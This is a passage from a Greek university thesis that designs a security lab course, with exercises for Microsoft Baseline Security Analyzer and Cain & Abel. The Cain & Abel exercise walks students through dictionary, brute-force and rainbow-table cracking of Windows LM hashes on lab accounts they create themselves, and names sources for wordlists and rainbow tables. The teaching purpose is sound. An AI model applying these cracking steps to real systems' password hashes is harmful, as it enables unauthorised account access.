• να επιτρέπουν στους σπουδαστές την περαιτέρω εξάσκησή τους στην αξιοποίηση των

δυνατοτήτων των εργαλείων

• να μπορούν να χρησιμοποιηθούν για περεταίρω εξάσκηση των σπουδαστών στους

προσωπικούς τους υπολογιστές, μέσω των δυνατοτήτων που παρέχει η αξιοποίηση της

τεχνολογίας των εικονικών μηχανών

• να καλλιεργούν κουλτούρα ασφάλειας

• να προβληματίζουν για τα ηθικά και νομικά ζητήματα της ασφάλειας

Κάθε εργαστηριακή άσκηση χαρακτηρίζεται από το όνομα του εργαλείου και το γνωστικό

πεδίο της ασφάλειας πληροφοριακών συστημάτων που εξετάζεται, τον τύπο (είδος) της, το

βαθμό δυσκολίας της και το στόχο της, τη συμμετοχή των σπουδαστών και το χρόνο

διδασκαλίας. Στη συνέχεια περιγράφονται τα χαρακτηριστικά των ασκήσεων.

Ονομασία Εργαλείου Είδος Εργαλείου (Αγγλικά) Απόδοση (Ελληνικά)

Microsoft Baseline

Security Analyzer

Vulnerability Scanner Εντοπισμός Ευπαθειών

Cain & Abel Password Cracking Ανάκτηση Συνθηματικών

Fast-Track Vulnerability Exploitation Εκμετάλλευση Ευπαθειών

Metasploit Vulnerability Exploitation Εκμετάλλευση Ευπαθειών

Microsoft Security

Assessment Tool

Risk Analysis Ανάλυση Επικινδυνότητας

Nessus Vulnerability Scanner Εντοπισμός Ευπαθειών

Nmap Network Scanning Εξερεύνηση Δικτύου

Paros Proxy Web Vulnerability Scanning Εντοπισμός Ευπαθειών

Εφαρμογών Ιστού

Snort Intrusion Detection Ανίχνευση Εισβολών

Wireshark Network Packet Sniffer Καταγραφή Δικτυακή

Κίνησης

Πίνακας 5-1: Εργαλεία και γνωστικό πεδίο που καλύπτουν

Τύπος (είδος) Άσκησης Περιγραφή

Τεχνική Πραγματοποιείται με τη χρήση συγκεκριμένου εργαλείου

Προγραμματιστική Απαιτείται παραμετροποίηση του εργαλείου

Πίνακας 5-2: Τύποι Ασκήσεων

Page 207: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

207 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Βαθμός Δυσκολίας Ερμηνεία και στόχος

1 Εισαγωγική άσκηση, σχετικά περιορισμένης έκτασης και μέτριας

έντασης, στοχεύει στην κατανόηση των βασικών αρχών του

γνωστικού πεδίου

2 Μέτριας έντασης και έκτασης άσκηση, στοχεύει στην περαιτέρω

εμπέδωση των σχετικών εννοιών

3 Σχετικά δύσκολη άσκηση, στοχεύει στην ανάπτυξη της κρίσης του

φοιτητή εφόσον κατέχει και έχει εμπεδώσει τις βασικές έννοιες.

Πίνακας 5-3: Βαθμός Δυσκολίας Ασκήσεων

5.3.6 Αξιολόγηση Σπουδαστών

Για την αξιολόγηση των σπουδαστών έχει δημιουργηθεί για κάθε άσκηση ένα φύλλο

αξιολόγησης. Με την έναρξη του εργαστηρίου ο εισηγητής μοιράζει στους σπουδαστές το

φύλλο αξιολόγησης που αφορά την εργαστηριακή άσκηση που θα διεξαχθεί. Οι σπουδαστές

θα πρέπει να συμπληρώσουν τα προσωπικά τους στοιχεία και κατά τη διάρκεια διεξαγωγής

της άσκησης να απαντήσουν τα ερωτήματα που περιέχει το φύλλο. Με την ολοκλήρωση του

εργαστηριακού μαθήματος οι σπουδαστές παραδίδουν το φύλλο αξιολόγησης στον εισηγητή

ο οποίος, αφού το ελέγξει, θα τους ενημερώσει για τη βαθμολογία που έλαβαν.

Η χρήση του φύλλου αξιολόγησης βοηθά τον εισηγητή πέρα από το να αξιολογήσει την

απόδοση των σπουδαστών, να εντοπίσει τα σημεία που αντιμετωπίζουν πρόβλημα και

δυσκολίες. Αυτό του παρέχει τη δυνατότητα τροποποίησης των ασκήσεων και προσαρμογής

τους στο επίπεδο γνώσεων και δυνατοτήτων των σπουδαστών. Επίσης, εάν οι αδυναμίες

εντοπίζονται σε περιορισμένο αριθμό σπουδαστών μπορεί να τους παρασχεθεί επιπλέον

βοήθεια είτε από τον ίδιο τον εισηγητή, είτε από την εθελοντική ομάδα ασφάλειας του

εργαστηρίου.

Page 208: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

208 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Κεφάλαιο 6 Εργαστηριακές ασκήσεις

6.1 Εισαγωγή

Για τη διεξαγωγή του εργαστηριακού μαθήματος αναπτύχθηκαν τριάντα (30) ασκήσεις

σύμφωνα με τα κριτήρια που αναφέρθηκαν στο προηγούμενο κεφάλαιο. Αναλυτικότερα, για

κάθε εργαλείο έχουν δημιουργηθεί τρεις (3) ασκήσεις με αυξανόμενο βαθμό δυσκολίας,

όπου αυτό ήταν εφικτό. Η πρώτη άσκηση κάθε εργαλείου είναι συνήθως εισαγωγική στη

χρήση του εργαλείου και αποσκοπεί στην εξοικείωση των σπουδαστών με αυτό καθώς και

στην ανάδειξη των βασικών δυνατοτήτων του. Η δεύτερη άσκηση είναι μέτριας εντάσεως

και αποσκοπεί στη εξέταση περισσότερο πολύπλοκων δυνατοτήτων του εργαλείου. Η τρίτη

άσκηση είναι πιο σύνθετη και αποσκοπεί στη διερεύνηση είτε πολύπλοκων θεμάτων

ασφάλειας, είτε σύνθετων λειτουργιών του εργαλείου. Επιπλέον, σε μερικές ασκήσεις

γίνεται συνδυασμός εργαλείων.

Page 209: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

209 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.2 Microsoft Baseline Security Analyzer (MBSA)

6.2.1 Εισαγωγική Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 1

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

MICROSOFT BASELINE SECURITY ANALYZER (MBSA)

Εργαλείο Microsoft Baseline Security Analyzer (MBSA)

Γνωστικό Πεδίο Εντοπισμός Ευπαθειών (Vulnerability Scanning)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 1

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 45 Λεπτά

Στόχος Στόχος αυτής της άσκησης είναι αφενός η εξοικείωση των φοιτητών με τη χρήση του εργαλείου και αφετέρου ο εντοπισμός και η καταγραφή κοινών και συχνά εμφανιζόμενων ευπαθειών σε ένα πληροφοριακό σύστημα που χρησιμοποιεί εφαρμογές Windows. Οι ευπάθειες μπορεί να οφείλονται είτε σε λάθη διαμόρφωσης είτε σε ελλείψεις κρίσιμων ενημερώσεων ασφάλειας. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να κατανοήσουν καλύτερα τις έννοιες που σχετίζονται με:

• τα συνθηματικά και την πολιτική συνθηματικών

• τους λογαριασμούς χρηστών

• την κοινή χρήση των αρχείων

• την κρισιμότητα των ενημερώσεων Περιγραφή Οι φοιτητές κάθε ομάδας πρέπει να εκτελέσουν το εργαλείο MBSA και να ανιχνεύσουν τις ευπάθειες ενός μεμονωμένο υπολογιστή. Αφού ολοκληρωθεί η ανίχνευση θα πρέπει να:

• καταγράψουν τα ευρήματά τους

• να προσδιορίσουν το πώς αυτά μπορούν να θέσουν σε κίνδυνο το πληροφοριακό σύστημα

• να προτείνουν τρόπους για την αντιμετώπισή τους. Παραδοτέο Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να παραδώσουν το ακόλουθο έντυπο.

Page 210: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

210 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

MICROSOFT BASELINE SECURITY ANALYZER (MBSA)

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Ποιες είναι οι κρίσιμες ευπάθειες που εντόπισε το εργαλείο MBSA στο σύστημα;

2. Ποιες εφαρμογές λογισμικού του υπολογιστή που ελέγχθηκε με το MBSA είναι πιο ευπαθείς, ώστε

να τις εκμεταλλευτεί ένας επιτιθέμενος;

3. Ποια είδη επιθέσεων μπορούν να πραγματοποιηθούν στο σύστημα με βάση τις ευπάθειες που

εντόπισε το MBSA;

4. Ποιες επιπτώσεις ενδέχεται να επιφέρουν στο σύστημα οι επιτυχημένες εκμεταλλεύσεις των

ευπαθειών που εντόπισε το εργαλείο;

5. Ποιους τρόπους αντιμετώπισης των ευπαθειών που εντοπίστηκαν προτείνετε;

6. Με βάση τις πληροφορίες που συλλέχθηκαν, ποια ευπάθεια θα διορθώνατε πρώτη;

Page 211: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

211 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.2.2 Μέτριας Εντάσεως Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 2

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

MICROSOFT BASELINE SECURITY ANALYZER (MBSA)

Εργαλείο Microsoft Baseline Security Analyzer (MBSA)

Γνωστικό Πεδίο Εντοπισμός Ευπαθειών (Vulnerability Scanning)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 2

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 45 Λεπτά

Στόχος Στόχος αυτής της άσκησης είναι αφενός η ανάπτυξη επιπλέον ικανοτήτων των φοιτητών στη χρήση του εργαλείου και αφετέρου ο εντοπισμός και η καταγραφή κοινών και συχνά εμφανιζόμενων ευπαθειών σε ένα απομακρυσμένο πληροφοριακό σύστημα, διαφορετικό για κάθε ομάδα, που χρησιμοποιεί εφαρμογές Windows και οι οποίες μπορεί να οφείλονται είτε σε λάθη διαμόρφωσης, είτε σε ελλείψεις κρίσιμων ενημερώσεων ασφάλειας. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να κατανοήσουν καλύτερα τις έννοιες που σχετίζονται με:

• τα συνθηματικά και την πολιτική συνθηματικών

• τους λογαριασμούς χρηστών

• την κρισιμότητα των ενημερώσεων

• την πολιτική απομακρυσμένης διαχείρισης ενός πληροφοριακού συστήματος

Περιγραφή Οι φοιτητές κάθε ομάδας θα πρέπει με τη χρήση του εργαλείου MBSA να ανιχνεύσουν τις ευπάθειες ενός απομακρυσμένου υπολογιστή στο δίκτυο. Αφού ολοκληρωθεί η ανίχνευση θα πρέπει να:

• καταγράψουν τα ευρήματά τους

• να προσδιορίσουν το πώς αυτά μπορούν να θέσουν σε κίνδυνο το πληροφοριακό σύστημα

• να προτείνουν τρόπους για την αντιμετώπισή τους. Παραδοτέο Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να παραδώσουν το ακόλουθο έντυπο.

Page 212: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

212 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

MICROSOFT BASELINE SECURITY ANALYZER (MBSA)

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Ποιες είναι οι κρίσιμες ευπάθειες που εντόπισε το εργαλείο MBSA στον απομακρυσμένο

υπολογιστή;

2. Αν ήσασταν εσείς ο επιτιθέμενος, ποια ευπάθεια θα εκμεταλλευόσασταν και γιατί;

3. Με ποιον τρόπο θα μπορούσε να έχει αποφευχθεί η εκμετάλλευση της ευπάθειας που επιλέξατε;

4. Ο λογαριασμός Guest είναι ενεργοποιημένος στο απομακρυσμένο σύστημα; Αν ναι, ποιοι οι κίνδυνοι

που διατρέχει το σύστημα;

5. Με βάση τις πληροφορίες που συλλέχθηκαν, ποια ευπάθεια θα διορθώνατε πρώτη;

Page 213: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

213 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.2.3 Σύνθετη Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 3

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

MICROSOFT BASELINE SECURITY ANALYZER (MBSA)

Εργαλείο Microsoft Baseline Security Analyzer (MBSA)

Γνωστικό Πεδίο Εντοπισμός Ευπαθειών (Vulnerability Scanning)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 3

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 30 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι αφενός η ανάπτυξη επιπλέον ικανοτήτων των φοιτητών στη

χρήση του εργαλείου και αφετέρου ο εντοπισμός και η καταγραφή κοινών και συχνά

εμφανιζόμενων ευπαθειών σε ένα απομακρυσμένο πληροφοριακό σύστημα που

χρησιμοποιεί εφαρμογές Windows και οι οποίες μπορεί να οφείλονται είτε σε λάθη

διαμόρφωσης, είτε σε ελλείψεις κρίσιμων ενημερώσεων ασφάλειας. Αναμένεται μέσω αυτής

της άσκησης οι φοιτητές να κατανοήσουν καλύτερα τις έννοιες που σχετίζονται με:

• τα συνθηματικά και την πολιτική συνθηματικών

• τους λογαριασμούς χρηστών

• την κρισιμότητα των ενημερώσεων

• την πολιτική απομακρυσμένης διαχείρισης ενός πληροφοριακού συστήματος

Περιγραφή

Οι φοιτητές κάθε ομάδας θα πρέπει με τη χρήση του εργαλείου MBSA να ανιχνεύσουν τις

ευπάθειες ενός απομακρυσμένου υπολογιστή στο δίκτυο. Αφού ολοκληρωθεί η ανίχνευση

θα πρέπει να:

• καταγράψουν τα ευρήματά τους

• να προσδιορίσουν το πώς αυτά μπορούν να θέσουν σε κίνδυνο το πληροφοριακό

σύστημα

• να προτείνουν τρόπους για την αντιμετώπισή τους.

Παραδοτέο

Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο.

Page 214: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

214 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

MICROSOFT BASELINE SECURITY ANALYZER (MBSA)

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Ποιες είναι οι κρίσιμες ευπάθειες που εντόπισε το εργαλείο MBSA στο απομακρυσμένο υπολογιστή;

2. Ποιες εφαρμογές λογισμικού του απομακρυσμένου υπολογιστή που ελέγχθηκε με το MBSA είναι πιο

ευπαθείς, ώστε να τις εκμεταλλευτεί ένας επιτιθέμενος;

3. Ποια είδη επιθέσεων μπορούν να πραγματοποιηθούν στο απομακρυσμένο σύστημα με βάση τις

ευπάθειες που εντόπισε το MBSA;

4. Ο λογαριασμός Guest είναι ενεργοποιημένος στο απομακρυσμένο σύστημα; Αν ναι, ποιοι οι κίνδυνοι

που διατρέχει το σύστημα;

5. Ποιους τρόπους αντιμετώπισης των ευπαθειών που εντοπίστηκαν προτείνετε;

6. Με βάση τις πληροφορίες που συλλέχθηκαν, ποια ευπάθεια θα διορθώνατε πρώτη;

Page 215: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

215 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.3 Cain & Abel

6.3.1 Εισαγωγική Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 1

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

CAIN & ABEL

Εργαλείο CAIN & ABEL

Γνωστικό Πεδίο Ανάκτηση συνθηματικών (Password Cracking)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 1

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 60 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι αφενός η εξοικείωση των φοιτητών με διάφορες τεχνικές

ανάκτησης συνθηματικών και αφετέρου η διερεύνηση του ρόλου των συνθηματικών στην

προστασία ενός πληροφοριακού συστήματος. Επιπλέον, αποσκοπεί στην ανάδειξη της

ευκολίας πρόσβασης των επιτιθέμενων σε εργαλεία και πληροφορίες τα οποία κάνουν

εύκολη την ανάκτηση συνθηματικών που χαρακτηρίζονται ως αδύναμα. Αναμένεται μέσω

αυτής της άσκησης οι φοιτητές να κατανοήσουν καλύτερα τις έννοιες που σχετίζονται με:

• αδύναμα και ισχυρά συνθηματικά

• την πολιτική ασφάλειας συνθηματικών

• τις μεθόδους ανάκτησης συνθηματικών που χρησιμοποιούνται από τους επιτιθέμενους

Περιγραφή

Ζητείται από τους φοιτητές να δημιουργήσουν σε ένα σύστημα που χρησιμοποιεί Windows

λειτουργικό, δύο λογαριασμούς χρηστών, ο ένας εκ των οποίων θα διαθέτει αδύναμο

συνθηματικό και ο άλλος ισχυρό και να τα καταγράψουν στο φύλλο αξιολόγησης.

Με τη χρήση μιας μηχανής αναζήτησης (π.χ. www.google.com) θα πραγματοποιήσουν

αναζήτηση του όρου “wordlists”. Από τα αποτελέσματα της αναζήτησης επιλέγουν το URL:

http://www.outpost9.com/files/WordLists.html και κάνουν λήψη του αρχείου norm&r.zip

το οποίο πρέπει να αποθηκευτεί και να αποσυμπιεστεί στον κατάλογο C:\wordlists.

Page 216: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

216 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Έπειτα τους ζητείται μεταβούν στη ιστοσελίδα http://ophcrack.sourceforge.net/tables.php

και να κατεβάσουν τις δύο δωρεάν εκδόσεις των XP Rainbow tables, XP free small και XP

free fast και να τις αποθηκεύσουν αφού τις αποσυμπιέσουν στον κατάλογο

C:\RainbowTables. Εναλλακτικά, μπορεί να έχει γίνει λήψη των αρχείων από το διδάσκοντα

πριν την έναρξη του εργαστηρίου, λόγω του μεγάλου μεγέθους τους.

Στη συνέχεια, με τη βοήθεια του Cain θα πρέπει να προσπαθήσουν να ανακτήσουν τα

συνθηματικά των λογαριασμών χρηστών του συστήματος, πραγματοποιώντας τις εξής

επιθέσεις στο σύστημα: με χρήση λεξικού, εξαντλητικής αναζήτησης και κρυπτανάλυσης με

χρήση Rainbow Tables.

Τα βήματα που πρέπει να ακολουθήσουν για κάθε περίπτωση επίθεσης είναι τα εξής:

Από την επιφάνεια εργασίας θα πρέπει να εκκινήσουν το Cain και από το γραφικό του

περιβάλλον να επιλέξουν την ετικέτα Cracker.

Με χρήση λεξικού

1. Στο δεξί μέρος του παραθύρου με δεξί κλικ επιλέγουν “add to list” και στη συνέχεια

“Import Hashes from local System” και κάνουν κλικ στο “Next”.

2. Με δεξί κλικ στο ίδιο παράθυρο επιλέγουν “Select All” και πάλι με δεξί κλικ επιλέγουν

“Dictionary Attack>LM Hashes”

3. Στο παράθυρο που εμφανίζεται προσθέτουν το λεξικό (wordlist) που βρίσκεται

αποθηκευμένο στον κατάλογο C:\wordlists κάνοντας δεξί κλικ στο παράθυρο και

επιλέγοντας “add to list” και στη συνέχεια “Start”. (Θα πρέπει στο πεδίο “Όνομα

Αρχείου” να εισάγουν “*.*” και να πατήσουν “Άνοιγμα” για να εμφανιστεί το αρχείο

του λεξικού).

4. Μόλις ολοκληρωθεί η επίθεση πατώντας “Exit” επιστρέφουν στο παράθυρο Cracker

όπου εμφανίζονται τα αποτελέσματα της επίθεσης.

5. Στη συνέχεια πρέπει να συμπληρώσουν το φύλλο αξιολόγησης.

Επίθεση Εξαντλητικής Αναζήτησης

Θα πραγματοποιηθούν επιθέσεις εξαντλητικής αναζήτησης για κάθε λογαριασμό που

δημιούργησαν οι φοιτητές στο σύστημα και θα απαντηθούν οι ερωτήσεις στο φύλλο

αξιολόγησης. Τα βήματα που ακολουθούνται για κάθε λογαριασμό είναι τα εξής:

Page 217: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

217 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

1. Επιλέγεται με κλικ του ποντικιού ο λογαριασμός που διαθέτει αδύναμο συνθηματικό. Με

δεξί κλικ επιλέγεται “Brute-Force Attack>LM Hashes” και στο παράθυρο που

εμφανίζεται επιλέγεται “Start”.

2. Μόλις ολοκληρωθεί η διαδικασία απαντώνται οι σχετικές ερωτήσεις στο φύλλο

αξιολόγησης.

3. Επαναλαμβάνεται οι διαδικασία για το λογαριασμό που διαθέτει ισχυρό συνθηματικό, όχι

όμως για περισσότερο από 5 λεπτά.

Επίθεση Κρυπτανάλυσης

Θα πραγματοποιηθούν επιθέσεις κρυπτανάλυσης για κάθε λογαριασμό που δημιούργησαν οι

φοιτητές στο σύστημα και θα απαντηθούν οι ερωτήσεις στο φύλλο αξιολόγησης.

Προηγουμένως θα πρέπει να καθαριστεί το παράθυρο από τα ευρήματα της προηγούμενης

επίθεσης επιλέγοντας με δεξί κλικ “Remove All” και στη συνέχεια να εκτελεστεί το βήμα 1

από τη λεξικογραφική επίθεση. Τα βήματα που ακολουθούνται για κάθε λογαριασμό είναι

τα εξής:

1. Επιλέγεται με κλικ του ποντικιού ο λογαριασμός που διαθέτει αδύναμο συνθηματικό. Με

δεξί κλικ επιλέγεται “Cryptanalysis Attack>LM Hashes>via RainbowTables

(OphCrack)”.

2. Στο παράθυρο που εμφανίζεται εισάγεται ο κατάλογος που περιέχει τους Rainbow Tables

και επιλέγεται το “Start”.

4. Μόλις ολοκληρωθεί η διαδικασία απαντώνται οι σχετικές ερωτήσεις στο φύλλο

αξιολόγησης.

5. Επαναλαμβάνεται οι διαδικασία για το λογαριασμό που διαθέτει ισχυρό συνθηματικό.

Παραδοτέο

Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο.

Page 218: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

218 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

Cain & Abel

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Σημειώστε τα στοιχεία των δύο λογαριασμών χρηστών που δημιουργήσατε:

1ος Λογαριασμός Κωδικός Χρήστη: Συνθηματικό: 2ος Λογαριασμός Κωδικός Χρήστη: Συνθηματικό:

Με χρήση λεξικού

2. Για πόσους και ποιους λογαριασμούς χρηστών ανακτήσατε τα συνθηματικά τους; Καταγράψτε τα

ευρήματά σας.

3. Ποιοι λογαριασμοί χρηστών δεν διαθέτουν συνθηματικά; Καταγράψτε τα ευρήματά σας.

4. Για τους λογαριασμούς χρηστών για τους οποίους δε καταφέρατε να ανακτήσετε τα συνθηματικά τι

θα κάνατε εναλλακτικά για να πετύχετε το στόχο σας χρησιμοποιώντας την ίδια μέθοδο επίθεσης;

Επίθεση Εξαντλητικής Αναζήτησης

5. Για το λογαριασμό που διαθέτει αδύναμο συνθηματικό καταφέρατε να το ανακτήσετε; Αν ναι, πόσο

χρονικό διάστημα χρειάστηκε περίπου;

6. Για το λογαριασμό που διαθέτει ισχυρό συνθηματικό καταφέρατε να το ανακτήσετε; Αν όχι, πόσος

